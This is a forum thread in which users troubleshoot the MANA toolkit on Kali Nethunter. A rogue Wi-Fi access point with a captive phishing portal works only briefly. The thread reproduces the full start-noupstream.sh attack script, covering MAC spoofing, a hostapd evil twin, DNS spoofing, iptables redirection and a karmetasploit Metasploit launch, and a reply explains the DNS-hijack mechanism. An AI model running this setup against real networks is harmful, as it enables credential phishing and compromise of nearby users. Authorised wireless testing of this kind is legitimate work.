No redirect/access to capitve portal.

[HeavensWing]

I'm running Nethunter on an S7E with TL-722n.

When running start-noupstream.sh everything seems fine, the AP comes up and everything as it should. For a short period of time, I can connect with my laptop and hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.

I cleared all the iptables thinking that an incoming connection was being blocked yet it didn't help.

I setup the same exact test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.

What is also strange, if I connect to the AP via my phone (same device as I'm running the test.) I can reach the page using the address 10.0.0.1.

/usr/share/mana-toolkit/run-mana/start-noupstream.sh ::::::::::::::

!/bin/bash

phy=wlan1 conf=/etc/mana-toolkit/hostapd-mana.conf hostapd=/usr/lib/mana-toolkit/hostapd

hostname WRT54G echo hostname WRT54G sleep 2

service network-manager stop rfkill unblock wlan

ifconfig $phy down macchanger -r $phy ifconfig $phy up

sed -i "s/^interface=.$/interface=$phy/" $conf sed -i "s/^set INTERFACE .$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc $hostapd $conf& sleep 5 ifconfig $phy 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf& dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy

dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf& service apache2 start stunnel4 /etc/mana-toolkit/stunnel.conf tinyproxy -c /etc/mana-toolkit/tinyproxy.conf& msfconsole -r /etc/mana-toolkit/karmetasploit.rc&

echo '1' > /proc/sys/net/ipv4/ip_forward iptables --policy INPUT ACCEPT iptables --policy FORWARD ACCEPT iptables --policy OUTPUT ACCEPT iptables -F iptables -t nat -F iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

echo "Hit enter to kill me" read pkill hostapd pkill dnsmasq pkill dnsspoof pkill tinyproxy pkill stunnel4 pkill ruby service apache2 stop iptables -t nat -F

[sku77]

same with me can you help us with this I am runnin it also on Nethunter . i can connect to the phone but cant ping the captive portal 10.0.0.1 thanks in advance.

[tanc7]

Hey I am not the dev who made this but from some debugging, I noticed there is a issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running the /usr/share/mana-toolkit/run-mana/start-noupstream.sh

By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file /etc/mana-toolkit/karmetasploit.rc

It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".

The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh

The file is located here: /etc/mana-toolkit/dnsspoof.conf

It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. https://github.com/sensepost/mana/commit/8c0286c8e69219a53e2b1351d6ce73957e506e5c

I been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because its fighting for the same port and host.

However, the with-uplink attack works perfectly, but using the no-uplink attack with a captive phishing portal seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.